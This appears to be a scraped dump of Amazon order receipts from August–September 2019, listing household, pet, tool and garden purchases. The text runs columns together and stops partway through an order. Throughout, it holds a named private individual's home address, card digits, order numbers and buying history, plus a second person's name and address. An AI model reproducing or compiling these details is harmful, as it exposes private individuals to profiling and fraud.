20010-3139 United States Grand Total:$12.10 Credit Card transactions Visa ending in 7528: September 13, 2019:$12.10 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2850449-2668241 Subscribe and Save Order Placed: September 13, 2019 Amazon.com order number: 111-2850449-2668241 Order Total: $13.27 This order contains Subscribe & Save items. Shipped on September 13, 2019 Items Ordered Price 1 of: HighKey Monk Fruit, Stevia, Erythritol Sweetener 2:1 Blend – Keto, Diabetic & Paleo Friendly – Granulated, Low Calorie, No Carb Natural Sugar Substitute – Non GMO, Vegan, Kosher, Non Glycemic 16 oz Sold by: HighKey Snacks (seller profile) $13.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $13.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Subscribe & Save: -$0.70 Billing address Brian Coady Total before tax: $13.271454 MONROE ST NW Estimated tax to be collected: $0.00WASHINGTON, DC 20010-3139 United States Grand Total:$13.27 Credit Card transactions Visa ending in 7528: September 13, 2019:$13.27 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2588669-0647454 Order Placed: September 7, 2019 Amazon.com order number: 111-2588669-0647454 Order Total: $87.48 Shipped on September 10, 2019 Items Ordered Price 1 of: Trashco Flings Bins POP UP All Occasion Black -10 Pack Sold by: Amazon.com Services LLC $39.99 Condition: New 1 of: AmazonBasics Mesh Trash Can Wastebasket, Black, 6-Pack Sold by: Amazon.com Services LLC $42.54 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $82.53 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $82.53 Brian Coady Estimated tax to be collected: $4.951454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$87.48 United States Credit Card transactions Visa ending in 7528: September 10, 2019:$87.48 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9887051-6089856 Order Placed: September 7, 2019 Amazon.com order number: 111-9887051-6089856 Order Total: $8.36 Shipped on September 8, 2019 Items Ordered Price 1 of: Medpride Vinyl Gloves| Large Box of 100| 4.3 mil Thick, Powder-Free, Non-Sterile, $7.89 Heavy Duty Disposable Gloves| Professional Grade for Healthcare, Med Sold by: HLmedical (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $7.89 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $7.89Brian Coady Estimated tax to be collected: $0.47 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.36 United States Credit Card transactions Visa ending in 7528: September 8, 2019:$8.36 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6406993-1343450 Order Placed: September 7, 2019 Amazon.com order number: 111-6406993-1343450 Order Total: $52.98 Shipped on September 9, 2019 Items Ordered Price 1 of: Nutramax Dasuquin Capsules for Cats 168ct (2 x 84ct) Sold by: Countryside Pet Supply Co. (seller profile) $49.98 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $49.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $49.98 Brian Coady Estimated tax to be collected: $3.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$52.98 United States Credit Card transactions Visa ending in 7528: September 9, 2019:$52.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6797796-1351457 Order Placed: September 7, 2019 Amazon.com order number: 111-6797796-1351457 Order Total: $7.92 Shipped on September 8, 2019 Items Ordered Price 1 of: GREAT STUFF PRO Dispensing Gun Cleaner, 12oz Sold by: Amazon.com Services LLC $7.47 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $7.47 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $7.47 Brian Coady Estimated tax to be collected: $0.45 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$7.92 United States Credit Card transactions Visa ending in 7528: September 8, 2019:$7.92 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2628171-0617059 Order Placed: September 7, 2019 Amazon.com order number: 111-2628171-0617059 Order Total: $9.53 Shipped on September 7, 2019 Items Ordered Price 1 of: PUTECH Spray Foam Replacement Tubes, Spray Foam Nozzles, 10-Pack Sold by: Putech Co., Ltd. (seller profile) $8.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $8.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $8.99 Brian Coady Estimated tax to be collected: $0.54 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$9.53 United States Credit Card transactions Visa ending in 7528: September 7, 2019:$9.53 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3025811-5837830 Order Placed: September 3, 2019 Amazon.com order number: 111-3025811-5837830 Order Total: $43.97 Shipped on September 4, 2019 Items Ordered Price 1 of: Catchmaster Sticky Fly Trap Ribbon -Indoor/Outdoor Fly Catcher -Pack of 20 Sold by: Integration Industries (seller profile) $13.50 Condition: New 1 of: Aunt Fannie's -FlyPunch Non-Toxic Fruit Fly Trap -Kill Fruit Flies -For Indoor Use (Single Pack) Sold by: Aunt Fannie's (seller profile) $7.99 Condition: New 1 of: Faicuk Clothes Moth Traps with Pheromone Attractant for Carpet and Closet, Pack of 6 Sold by: FAICUK (seller profile) $19.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $41.48 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $41.48 Brian Coady Estimated tax to be collected: $2.49 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$43.97 United States Credit Card transactions Visa ending in 7528: September 4, 2019:$43.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-9889981-7501802 Order Placed: September 2, 2019 Amazon.com order number: 111-9889981-7501802 Order Total: $27.54 Shipped on September 3, 2019 Items Ordered Price 1 of: Josh's Frogs Black Soldier Fly Larvae (50 Count -Extra Small) Sold by: Josh's Frogs (seller profile) $7.99 Condition: New 1 of: Josh's Frogs Black Soldier Fly Larvae (1000 Count -Small) Sold by: Josh's Frogs (seller profile) $17.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $25.98 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $25.98 Brian Coady Estimated tax to be collected: $1.561454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$27.54 United States Credit Card transactions Visa ending in 7528: September 3, 2019:$27.54 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5411564-0561815 Order Placed: September 2, 2019 Amazon.com order number: 111-5411564-0561815 Order Total: $217.16 Shipped on September 4, 2019 Items Ordered 1 of: Safety Nailer (Pack of 1) -For Nails Sold by: Safety Nailer (seller profile) Price $9.99 Condition: New 1 of: Bon 15-439 8-Inch Magnetic Nail Holder with Protective Grip Sold by: Amazon.com Services LLC $25.08 Condition: New 1 of: Fein 32127069010 Depth Stop For All Saw Blades Sold by: Amazon.com Services LLC $22.99 Condition: New 1 of: Fein 63502184270 Bi-Metal Oscillating Blade (3 Pack), 3/8 x 1-3/16" Sold by: Amazon.com Services LLC $31.81 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Shipped on September 2, 2019 Items Ordered 1 of: Fein 63502236290 Starlock E-Cut Carbide Pro Hard Metal Plunge Cut Saw Blade, TiN Coated, 1-3/4" Length x 1-3/8" Width (Pack of 10) Sold by: TimpTools (seller profile) Price $115.00 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Print this page for your records. Shipping Speed: No-Rush Shipping Payment information Payment Method: Visa | Last digits: 7528 Item(s) Subtotal: $204.87 Shipping & Handling: $0.00 ---- Billing address Brian Coady 1454 MONROE ST NW Total before tax: $204.87 Estimated tax to be collected: $12.29 ---- WASHINGTON, DC 20010-3139 United States Grand Total:$217.16 Credit Card transactions Visa ending in 7528: September 4, 2019: $24.37 Visa ending in 7528: September 4, 2019:$192.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3599601-2909803 Order Placed: September 2, 2019 Amazon.com order number: 111-3599601-2909803 Seller's order number: 1386942824557 Order Total: $20.94 Shipped on September 3, 2019 Items Ordered Price 1 of: Symton Medium Feeding Grade Black Soldier Fly Larvae Sold by: Symton® Black Soldier Fly (seller profile) $17.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $17.99 Visa | Last digits: 7528 Shipping & Handling: $2.95 Billing address Total before tax: $20.94Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$20.94 United States Credit Card transactions Visa ending in 7528: September 3, 2019:$20.94 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7189037-0106637 Order Placed: September 2, 2019 Amazon.com order number: 111-7189037-0106637 Order Total: $12.71 Shipped on September 2, 2019 Items Ordered Price 1 of: XCEL Large Rubber Sheets Value Pack, Neoprene, 8 Piece 9" x 10" Assorted Thickness DIY for Gasket Material, Made in USA, Easy Cut Material Sold by: XCEL (seller profile) | Product question? Ask Seller $11.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $11.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $11.99Brian Coady Estimated tax to be collected: $0.721454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.71 United States Credit Card transactions Visa ending in 7528: September 2, 2019:$12.71 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7129092-5453069 Order Placed: August 26, 2019 Amazon.com order number: 114-7129092-5453069 Order Total: $14.85 Shipped on August 27, 2019 Items Ordered Price 1 of: Hoosier Hill Farm Vital Wheat Gluten, 4 Pound Sold by: Hoosier Hill Farm (seller profile) $14.85 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.85 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.85 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$14.85 United States Credit Card transactions Visa ending in 7528: August 27, 2019:$14.85 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9770804-5440205 Order Placed: August 26, 2019 Amazon.com order number: 114-9770804-5440205 Order Total: $21.99 Shipped on August 27, 2019 Items Ordered Price 1 of: Lifesource Foods Oat Fiber 500 (5 lb) Sold by: Manufacturer Authorized Resellers (seller profile) | Product question? Ask Seller $21.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $21.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $21.99 Brian Coady Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$21.99 United States Credit Card transactions Visa ending in 7528: August 27, 2019:$21.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8653551-9763410 Order Placed: August 26, 2019 Amazon.com order number: 114-8653551-9763410 Order Total: $74.19 Shipped on August 27, 2019 Items Ordered Price 1 of: Best Pet Supplies Foldable CertiPUR-US Certified Foam Pet Stairs/Steps -Brown $69.99 Linen, 4-Step (H: 22") Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $69.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $69.99Brian Coady Estimated tax to be collected: $4.201454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$74.19 United States Credit Card transactions Visa ending in 7528: August 27, 2019:$74.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8100569-0505010 Order Placed: August 26, 2019 Amazon.com order number: 114-8100569-0505010 Order Total: $80.55 Shipped on August 27, 2019 Items Ordered Price 1 of: Pet Gear Free Standing Ramp for Cats and Dogs. Great for SUV’s or use Next to $75.99 your Bed. 4 Models to Choose from, Supports 200-300 lbs, Lightweight Easy-Fold Design Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $75.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $75.99 Brian Coady Estimated tax to be collected: $4.561454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$80.55 United States Credit Card transactions Visa ending in 7528: August 27, 2019:$80.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7875432-8893809 Order Placed: August 25, 2019 Amazon.com order number: 114-7875432-8893809 Order Total: $8.47 Shipped on August 27, 2019 Items Ordered Price 1 of: SummitLink 415 Pcs Black Assorted Heat Shrink Tube 10 Sizes Tubing Wrap Sleeve Set Combo Sold by: Hansen Tech (seller profile) $7.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $7.99Brian Coady Estimated tax to be collected: $0.48 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.47 United States Credit Card transactions Visa ending in 7528: August 27, 2019:$8.47 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1006499-1248257 Order Placed: August 25, 2019 Amazon.com order number: 114-1006499-1248257 Order Total: $7.62 Shipped on August 26, 2019 Items Ordered Price 1 of: Accessbuy 225PCS White Clear Heat Shrink Tubing Tube Cable Wrab Sleeve Kit with Storage Case (AC090) Sold by: Accessbuy2 (seller profile) $7.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $7.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Your Coupon Savings:-$0.80 Billing address Brian Coady Total before tax: $7.191454 MONROE ST NW Estimated tax to be collected: $0.43WASHINGTON, DC 20010-3139 United States Grand Total: $7.62 Credit Card transactions Visa ending in 7528: August 26, 2019:$7.62 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-1512545-5181058 Order Placed: August 25, 2019 Amazon.com order number: 113-1512545-5181058 Order Total: $12.51 Shipped on August 26, 2019 Items Ordered Price 1 of: Potassium Carbonate (lb) Sold by: Amazon.com Services LLC $11.80 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $11.80 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $11.80 Brian Coady Estimated tax to be collected: $0.711454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$12.51 United States Credit Card transactions Visa ending in 7528: August 26, 2019:$12.51 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2053661-4997041 Order Placed: August 25, 2019 Amazon.com order number: 114-2053661-4997041 Order Total: $8.47 Shipped on August 26, 2019 Items Ordered Price 1 of: Keyboard Cleaning Gel, Unisersal Keyboard Cleaner Quickly to Remove $7.99 Crumbs,Scraps,Dust,Germs,Hair for PC Tablet Laptop Keyboards, Car Vents, Cameras, Sold by: MulanStar (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $7.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $7.99Brian Coady Estimated tax to be collected: $0.48 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.47 United States Credit Card transactions Visa ending in 7528: August 26, 2019:$8.47 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7568326-5446639 Order Placed: August 24, 2019 Amazon.com order number: 114-7568326-5446639 Order Total: $15.89 Shipped on August 25, 2019 Items Ordered 1 of: ASURION 4 Year Kitchen Protection Plan $90-99.99 Sold by: Asurion, LLC (seller profile) Price $14.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $14.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $14.99 Brian Coady Estimated tax to be collected: $0.901454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$15.89 United States Credit Card transactions Visa ending in 7528: August 25, 2019:$15.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1137594-6591444 Order Placed: August 24, 2019 Amazon.com order number: 114-1137594-6591444 Order Total: $100.49 Shipped on August 25, 2019 Items Ordered Price 1 of: Breville BSB510XL Control Grip Immersion Blender $94.80 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Grand Total:$100.49 Payment information Payment Method: Visa | Last digits: 7528 Item(s) Subtotal: Shipping & Handling: $94.80 $0.00 Billing address Brian Coady 1454 MONROE ST NW Total before tax: Estimated tax to be collected: $94.80 $5.69 WASHINGTON, DC 20010-3139 United States Credit Card transactions Visa ending in 7528: August 25, 2019:$100.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6729492-6553849 Order Placed: August 24, 2019 Amazon.com order number: 114-6729492-6553849 Order Total: $63.70 Shipped on August 25, 2019 Items Ordered Price 1 of: Slice 10400 Box Cutter, 3 Position Manual Button with Ceramic Blade Sold by: Amazon.com Services LLC $15.35 Condition: New 1 of: Slice 10404 Replacement Ceramic Blades for the Slice Box Cutter, 4 Pack Sold by: Amazon.com Services LLC $14.75 Condition: New 1 of: Cool Hand Zirconia Ceramic Utility Blade, Replacement Blades, Box Cutter, 6 Pcs per Pack Sold by: COOL HAND (seller profile) $29.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $60.09 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $60.09 Brian Coady Estimated tax to be collected: $3.61 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$63.70 United States Credit Card transactions Visa ending in 7528: August 25, 2019:$63.70 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #113-0745232-0343441 Order Placed: August 23, 2019 Amazon.com order number: 113-0745232-0343441 Order Total: $13.77 Shipped on August 24, 2019 Items Ordered Price 1 of: BEAULIFE 304 Stainless Steel Metal Short Garden Hose 3 Feet Flexible, Portable $12.99 & Lightweight Kink Free Garden Water Outdoor Hose Sold by: Modern Tek (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $12.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $12.99Brian Coady Estimated tax to be collected: $0.781454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$13.77 United States Credit Card transactions Visa ending in 7528: August 24, 2019:$13.77 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7823578-2009801 Order Placed: August 21, 2019 Amazon.com order number: 114-7823578-2009801 Order Total: $53.12 Shipped on August 21, 2019 Items Ordered Price 1 of: Little Giant 554530 VCMX-20ULS 115-volt Condensate Pump, blue Sold by: Amazon.com Services LLC $50.11 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $50.11 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $50.11 Brian Coady Estimated tax to be collected: $3.011454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$53.12 United States Credit Card transactions Visa ending in 7528: August 21, 2019:$53.12 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6122590-2572262 Order Placed: August 21, 2019 Amazon.com order number: 114-6122590-2572262 Order Total: $31.79 Shipped on August 21, 2019 Items Ordered 1 of: ASURION 3 Year Lawn and Garden Extended Protection Plan $125-149.99 Sold by: Asurion, LLC (seller profile) Price $29.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $29.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $29.99 Brian Coady Estimated tax to be collected: $1.801454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$31.79 United States Credit Card transactions Visa ending in 7528: August 21, 2019:$31.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4415904-9443453 Order Placed: August 21, 2019 Amazon.com order number: 114-4415904-9443453 Order Total: $148.39 Shipped on August 21, 2019 Items Ordered Price 1 of: Earthwise GS70015 15 Amp Electric Garden Chipper Shredder, Collection Bin $139.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $139.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $139.99 Brian Coady Estimated tax to be collected: $8.401454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$148.39 United States Credit Card transactions Visa ending in 7528: August 21, 2019:$148.39 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0413247-6709020 Order Placed: August 21, 2019 Amazon.com order number: 114-0413247-6709020 Order Total: $10.57 Shipped on August 21, 2019 Items Ordered Price 1 of: Dr. Earth Pure & Natural Compost Starter 3 lb Sold by: Amazon.com Services LLC $9.97 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $9.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $9.97 Brian Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.57 United States Credit Card transactions Visa ending in 7528: August 21, 2019:$10.57 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0288127-0221057 Order Placed: August 17, 2019 Amazon.com order number: 114-0288127-0221057 Order Total: $29.88 Shipped on August 18, 2019 Items Ordered Price 1 of: 100% Pure Resveratrol -1000mg Per Serving Max Strength (180 Capsules) Antioxidant Supplement Extract, Natural Trans-Resveratrol Pills for Heart Health & Weight Loss, Trans Resveratrol for Anti-Aging Sold by: aSquared Brands (seller profile) $27.99 Condition: New Shipping Address: Maureen Brooks 400 W SHERWOOD DR DEFIANCE, OH 43512-8728 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $27.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $27.99 Brian Coady Estimated tax to be collected: $1.891454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$29.88 United States Credit Card transactions Visa ending in 7528: August 18, 2019:$29.88 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0151018-6156215 Order Placed: August 16, 2019 Amazon.com order number: 111-0151018-6156215 Order Total: $143.07 Shipped on August 17, 2019 Items Ordered Price 2 of: Conntek 14511: 15 Amp Extension Cord, 25 Feet, UL Listed $39.99 Sold by: Amazon.com Services LLC Condition: New 1 of: Century 50 ft 10 gauge extension cord -Extension Cord With Lighted Ends (50, $54.99 Orange) Sold by: RED ROVER (seller profile) Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $134.97 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $134.97Brian Coady Estimated tax to be collected: $8.101454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$143.07 United States Credit Card transactions Visa ending in 7528: August 17, 2019:$143.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0638473-1293062 Order Placed: August 15, 2019 Amazon.com order number: 111-0638473-1293062 Order Total: $37.65 Shipped on August 16, 2019 Items Ordered Price 1 of: Door Stopper 6 Pack [1.3" high] -Bonus EBOOK & Holders -SofiHome Premium $16.15 Heavy Duty Door Stop Rubber Wedge with Decorative Holder -Ideal for Large & Small Door Gaps -The Improved (6, Gray) Sold by: SofiGOODs (seller profile) | Product question? Ask Seller Condition: New 1 of: Honeywell QuietSet Mini Tower Table Fan, HTF210B, 1 Pack, Black $20.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $37.14 Visa | Last digits: 7528 Shipping & Handling: $0.00 Your Coupon Savings: -$1.62 Billing address Brian Coady Total before tax: $35.521454 MONROE ST NW Estimated tax to be collected: $2.13WASHINGTON, DC 20010-3139 United States Grand Total:$37.65 Credit Card transactions Visa ending in 7528: August 16, 2019:$37.65 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3637218-3209037 Order Placed: August 14, 2019 Amazon.com order number: 111-3637218-3209037 Order Total: $19.07 Shipped on August 15, 2019 Items Ordered Price 1 of: GLOUE Bug Zapper Light Bulb, 2 in 1 Mosquito Killer Lamp UV Led Electronic Insect & Fly Killer for Indoor and Outdoor ,E26 or E27 Sold by: YeLuLu (seller profile) $17.99 Condition: New Shipping Address: Brian Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $17.99 Visa | Last digits: 7528 Shipping & Handling: $0.00 Billing address Total before tax: $17.99Brian Coady Estimated tax to be collected: $1.081454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$19.07 United States Credit Card transactions Visa ending in 7528: August 15, 2019:$19.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8074023-1515465 Order Placed: August 14, 2019 Amazon.com order number: 111-8074023-1515465 Order Total: $42.39 Shipped on August 15, 2019 Items Ordered Price 1 of: iRobot 4502233 Robot Vacuum, Black (Renewed) 